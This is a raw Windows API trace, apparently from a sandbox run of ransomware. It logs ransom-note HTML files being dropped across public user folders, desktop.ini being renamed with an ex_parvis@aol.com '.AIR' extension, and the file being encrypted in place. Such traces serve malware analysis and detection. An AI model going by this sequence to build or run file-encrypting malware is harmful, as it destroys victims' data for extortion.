	[0053.135] WriteFile (in: hFile=0x458, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.135] WriteFile (in: hFile=0x458, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.135] CloseHandle (hObject=0x458) returned 1
	[0053.135] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.135] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.135] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.135] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584a08 | out: hHeap=0x540000) returned 1
	[0053.136] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xca7d8d10, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca7d8d10, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1
	[0053.136] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.136] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.136] GetLastError () returned 0x0
	[0053.136] CreateFileW (lpFileName="C:\\\\Users\\Public\\Favorites\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\favorites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458
	[0053.136] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.136] WriteFile (in: hFile=0x458, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.137] WriteFile (in: hFile=0x458, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.137] WriteFile (in: hFile=0x458, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.137] CloseHandle (hObject=0x458) returned 1
	[0053.138] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.138] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.138] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.138] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584a50 | out: hHeap=0x540000) returned 1
	[0053.138] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1
	[0053.138] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.138] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.138] GetLastError () returned 0xb7
	[0053.138] CreateFileW (lpFileName="C:\\\\Users\\Public\\Libraries\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\libraries\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458
	[0053.140] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.140] WriteFile (in: hFile=0x458, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.141] WriteFile (in: hFile=0x458, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.141] WriteFile (in: hFile=0x458, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.141] CloseHandle (hObject=0x458) returned 1
	[0053.141] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.141] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.141] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.141] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584a98 | out: hHeap=0x540000) returned 1
	[0053.141] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1
	[0053.141] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.141] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.142] GetLastError () returned 0x0
	[0053.142] CreateFileW (lpFileName="C:\\\\Users\\Public\\Music\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\music\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458
	[0053.142] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58bc00 | out: hHeap=0x540000) returned 1
	[0053.142] WriteFile (in: hFile=0x458, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.143] WriteFile (in: hFile=0x458, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.143] WriteFile (in: hFile=0x458, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.143] CloseHandle (hObject=0x458) returned 1
	[0053.143] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.143] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.143] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.143] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583988 | out: hHeap=0x540000) returned 1
	[0053.143] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1
	[0053.143] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.143] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.143] GetLastError () returned 0x0
	[0053.143] CreateFileW (lpFileName="C:\\\\Users\\Public\\Pictures\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\pictures\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458
	[0053.144] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.144] WriteFile (in: hFile=0x458, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.145] WriteFile (in: hFile=0x458, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.145] WriteFile (in: hFile=0x458, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.145] CloseHandle (hObject=0x458) returned 1
	[0053.145] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.145] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.145] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.145] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584ae0 | out: hHeap=0x540000) returned 1
	[0053.145] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1
	[0053.145] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.145] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.145] GetLastError () returned 0x0
	[0053.145] CreateFileW (lpFileName="C:\\\\Users\\Public\\Recorded TV\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\recorded tv\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458
	[0053.146] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.146] WriteFile (in: hFile=0x458, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.147] WriteFile (in: hFile=0x458, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.147] WriteFile (in: hFile=0x458, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.147] CloseHandle (hObject=0x458) returned 1
	[0053.147] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.147] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.147] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.147] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da0f0 | out: hHeap=0x540000) returned 1
	[0053.147] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d6ecd0, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9d6ecd0, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9d6ecd0, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0053.147] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.147] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.147] GetLastError () returned 0x0
	[0053.148] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1
	[0053.148] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.148] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.148] GetLastError () returned 0x0
	[0053.148] CreateFileW (lpFileName="C:\\\\Users\\Public\\Videos\\TRY_TO_READ.html" (normalized: "c:\\users\\public\\videos\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458
	[0053.149] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5d9290 | out: hHeap=0x540000) returned 1
	[0053.149] WriteFile (in: hFile=0x458, lpBuffer=0x59f090*, nNumberOfBytesToWrite=0x548, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0x59f090*, lpNumberOfBytesWritten=0x3a1f8b0*=0x548, lpOverlapped=0x0) returned 1
	[0053.149] WriteFile (in: hFile=0x458, lpBuffer=0xe4a1f8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe4a1f8*, lpNumberOfBytesWritten=0x3a1f8b0*=0x28, lpOverlapped=0x0) returned 1
	[0053.150] WriteFile (in: hFile=0x458, lpBuffer=0xe328d0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x3a1f8b0, lpOverlapped=0x0 | out: lpBuffer=0xe328d0*, lpNumberOfBytesWritten=0x3a1f8b0*=0x4b, lpOverlapped=0x0) returned 1
	[0053.150] CloseHandle (hObject=0x458) returned 1
	[0053.150] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588d60 | out: hHeap=0x540000) returned 1
	[0053.150] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967d0 | out: hHeap=0x540000) returned 1
	[0053.150] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.150] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583918 | out: hHeap=0x540000) returned 1
	[0053.150] FindNextFileW (in: hFindFile=0x5758a0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0
	[0053.150] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5da0f0
	[0053.150] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0053.150] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0053.150] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0053.150] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0053.150] SetFileAttributesW (lpFileName="C:\\\\Users\\Public\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0053.150] lstrlenW (lpString="C:\\\\Users\\Public\\desktop.ini") returned 28
	[0053.150] GetProcessHeap () returned 0x540000
	[0053.150] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9e) returned 0x56b300
	[0053.151] lstrcpyW (in: lpString1=0x56b300, lpString2="C:\\\\Users\\Public\\desktop.ini" | out: lpString1="C:\\\\Users\\Public\\desktop.ini") returned="C:\\\\Users\\Public\\desktop.ini"
	[0053.151] lstrcatW (in: lpString1="C:\\\\Users\\Public\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\Public\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\Public\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0053.151] MoveFileExW (lpExistingFileName="C:\\\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), lpNewFileName="C:\\\\Users\\Public\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0053.153] CreateFileW (lpFileName="C:\\\\Users\\Public\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\public\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458
	[0053.154] GetProcessHeap () returned 0x540000
	[0053.154] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b300 | out: hHeap=0x540000) returned 1
	[0053.154] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=174) returned 1
	[0053.154] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xae
	[0053.154] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0053.154] GetProcessHeap () returned 0x540000
	[0053.154] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0053.154] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0053.154] WriteFile (in: hFile=0x458, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0053.155] WriteFile (in: hFile=0x458, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0053.155] WriteFile (in: hFile=0x458, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0053.155] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xae) returned 0x598d40
	[0053.155] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xae) returned 0x598c88
	[0053.155] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0053.155] ReadFile (in: hFile=0x458, lpBuffer=0x598d40, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x598d40*, lpNumberOfBytesRead=0x3a1f778*=0xae, lpOverlapped=0x0) returned 1
	[0053.155] SetFilePointer (in: hFile=0x458, lDistanceToMove=-174, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0053.155] WriteFile (in: hFile=0x458, lpBuffer=0x598c88*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x598c88*, lpNumberOfBytesWritten=0x3a1f778*=0xae, lpOverlapped=0x0) returned 1
	[0053.155] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598d40 | out: hHeap=0x540000) returned 1
	[0053.155] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598c88 | out: hHeap=0x540000) returned 1
	[0053.155] CloseHandle (hObject=0x458) returned 1
	[0053.156] GetProcessHeap () returned 0x540000
	[0053.156] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0053.156] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0053.156] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0053.156] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5da0f0 | out: hHeap=0x540000) returned 1
	[0053.156] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584930 | out: hHeap=0x540000) returned 1
	[0053.156] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x90) returned 0x56b300
	[0053.156] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583950 | out: hHeap=0x540000) returned 1
	[0053.156] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x588de8 | out: hHeap=0x540000) returned 1
	[0053.156] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x596d50 | out: hHeap=0x540000) returned 1
	[0053.156] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e53510, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e53510, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5758e0
	[0053.157] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.157] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.157] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588de8
	[0053.157] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.157] GetLastError () returned 0x0
	[0053.157] FindNextFileW (in: hFindFile=0x5758e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc9e53510, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9e53510, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0053.157] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db0d8 | out: hHeap=0x540000) returned 1
	[0053.157] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846f0
	[0053.157] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x588de8
	[0053.157] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846f0 | out: hHeap=0x540000) returned 1
	[0053.157] GetLastError () returned 0x0
